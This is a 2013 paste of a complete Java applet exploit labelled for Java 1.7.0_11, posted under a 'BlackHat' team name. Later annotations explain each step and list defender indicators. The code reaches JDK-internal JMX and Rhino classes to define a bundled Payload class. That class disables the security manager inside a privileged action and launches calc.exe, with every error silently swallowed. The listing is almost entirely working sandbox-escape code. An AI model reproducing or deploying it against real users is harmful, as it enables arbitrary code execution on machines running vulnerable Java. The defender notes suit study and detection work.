gabby

ngetes doank =))

Feb 20th, 2013
  1. /*
  2. * (Java 1.7.0_11 Exploit)
  3. *
  4. * Ngetes doank :v
  5. *
  6. * http://www.facebook.com/Gabby.IndoNesian.BlackHat.Team
  7. */
  8. import java.applet.Applet;
  9. import com.sun.jmx.mbeanserver.Introspector;
  10. import com.sun.jmx.mbeanserver.JmxMBeanServer;
  11. import com.sun.jmx.mbeanserver.MBeanInstantiator;
  12. import java.lang.invoke.MethodHandle;
  13. import java.lang.invoke.MethodHandles.Lookup;
  14. import java.lang.invoke.MethodType;
  15. import java.lang.reflect.InvocationTargetException;
  16. import java.lang.reflect.Method;
  17. import javax.management.ReflectionException;
  18. import java.io.*;
  19.  
  /**
   * Applet whose init() defines and runs a bundled Payload.class through class
   * loaders reached via JDK-internal classes (com.sun.jmx.mbeanserver.* and
   * sun.org.mozilla.javascript.internal.*). The paste header labels it an
   * exploit for Java 1.7.0_11.
   *
   * Defender notes: applet-delivered code that references these internal
   * packages is a useful static indicator when triaging a JAR.
   * NOTE(review): which JRE updates block this chain is not shown on this
   * page; confirm against the vendor's advisories before relying on a version.
   */
  20. public class PaunchGift extends Applet
  21. {
  22.  
  /**
   * Applet lifecycle hook. Reads Payload.class from the applet's own resources
   * into a byte array, obtains a class loader from the internal Rhino Context
   * class, defines a class from those bytes, instantiates it and then calls its
   * static outSandbox() method.
   */
  23. public void init()
  24. {
  25.  
  26. try
  27. {
  28. int length;
  29. byte[] buffer = new byte[5000];
  30. ByteArrayOutputStream os = new ByteArrayOutputStream();
  31.  
  32. // read in the class file from the jar
  33. InputStream is = getClass().getResourceAsStream("Payload.class");
  34.  
  35. // and write it out to the byte array stream
  36. while( ( length = is.read( buffer ) ) > 0 )
  37. os.write( buffer, 0, length );
  38.  
  39. // convert it to a simple byte array
  40. buffer = os.toByteArray();
  41.  
  // Resolve the internal Rhino Context class by name through gimmeClass().
  42. Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context");
  43.  
  // Context.enter() is looked up as the zero-argument overload (flag == true)
  // and invoked statically; createClassLoader is then invoked on the returned
  // object with a single null argument.
  44. Method method = getMethod(class1, "enter", true);
  45. Object obj = method.invoke(null, new Object[0]);
  46. Method method1 = getMethod(class1, "createClassLoader", false);
  47. Object obj1 = method1.invoke(obj, new Object[1]);
  48.  
  49. Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
  50. Method method2 = getMethod(class2, "defineClass", false);
  51.  
  // defineClass is called on the loader object with a null name and the bytes
  // of Payload.class read above.
  52. Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer });
  // Instantiating the class runs the Payload constructor.
  53. my_class.newInstance();
  54. Method m_outSandbox = my_class.getMethod("outSandbox", new Class[0]);
  55. m_outSandbox.invoke(null, new Object[] {});
  56.  
  57. }
  // Every Throwable is swallowed, so a failed run leaves no visible error in
  // the applet itself.
  58. catch (Throwable localThrowable){}
  59.  
  60. }
  61.  
  62.  
  /**
   * Returns the first declared method of class1 whose name matches s (compared
   * with ==) and which, when flag is true, takes no parameters. Returns null
   * when nothing matches or when any exception is thrown.
   *
   * The method array is read through
   * Introspector.elementFromComplex(class1, "declaredMethods") instead of a
   * direct reflection call on class1.
   * NOTE(review): presumably so that JDK code performs the lookup; confirm.
   */
  63. private Method getMethod(Class class1, String s, boolean flag)
  64. {
  65. try {
  66. Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
  67. Method[] amethod1 = amethod;
  68.  
  69. for (int i = 0; i < amethod1.length; i++) {
  70. Method method = amethod1[i];
  71. String s1 = method.getName();
  72. Class[] aclass = method.getParameterTypes();
  73. if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
  74. }
  75. } catch (Exception localException) { }
  76.  
  77. return null;
  78. }
  79.  
  /**
   * Resolves the class named s by reflectively invoking
   * MBeanInstantiator.findClass(String, ClassLoader) on the instantiator of a
   * newly created JmxMBeanServer, passing null as the class loader. init()
   * uses it for the two sun.org.mozilla.javascript.internal.* names.
   *
   * @throws ReflectionException declared by the signature
   * @throws ReflectiveOperationException if the reflective lookup or call fails
   */
  80. private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
  81. {
  // Held only so that a null ClassLoader argument can be passed below.
  82. Object obj = null;
  83. JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
  84. MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();
  85.  
  86. Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
  87. Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
  88. return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
  89. }
  90.  
  91. }
  92.  
  93. ###############################################
  94. import java.lang.reflect.Method;
  95. import java.security.AccessController;
  96. import java.security.PrivilegedExceptionAction;
  97.  
  /**
   * Class whose bytes PaunchGift.init() reads from "Payload.class" and defines
   * at run time. Its constructor runs the instance as a privileged action that
   * sets the JVM security manager to null; outSandbox() then starts an external
   * program.
   *
   * Defender notes: a System.setSecurityManager(null) call reached from
   * applet-delivered code, and a child process started by the hosting Java
   * process, are the behavioural indicators this listing exhibits.
   */
  98. public class Payload implements PrivilegedExceptionAction
  99. {
  100.  
  /**
   * Runs run() via AccessController.doPrivileged(this). Any exception is
   * swallowed, so construction never reports a failure.
   */
  101. public Payload()
  102. {
  103. try
  104. {
  105. AccessController.doPrivileged(this);
  106. }
  107. catch(Exception exception) { }
  108. }
  109.  
  /**
   * Privileged action body: looks up System.setSecurityManager(SecurityManager)
   * reflectively and invokes it with a single null argument, which removes the
   * installed security manager if the call is permitted.
   *
   * @return always null
   * @throws Exception if the reflective lookup or invocation fails
   */
  110. public Object run() throws Exception
  111. {
  112. Class cl = System.class;
  113. Method m = cl.getMethod("setSecurityManager", new Class[] { SecurityManager.class });
  114. m.invoke(null, new Object[1]);
  115. return null;
  116. }
  117.  
  /**
   * Starts "calc.exe" through Runtime.exec. The visible effect is a calculator
   * window, serving as a marker that code ran outside the applet sandbox.
   *
   * @throws Exception if the process cannot be started
   */
  118. public static void outSandbox() throws Exception
  119. {
  120. Runtime.getRuntime().exec("calc.exe");
  121. }
  122. }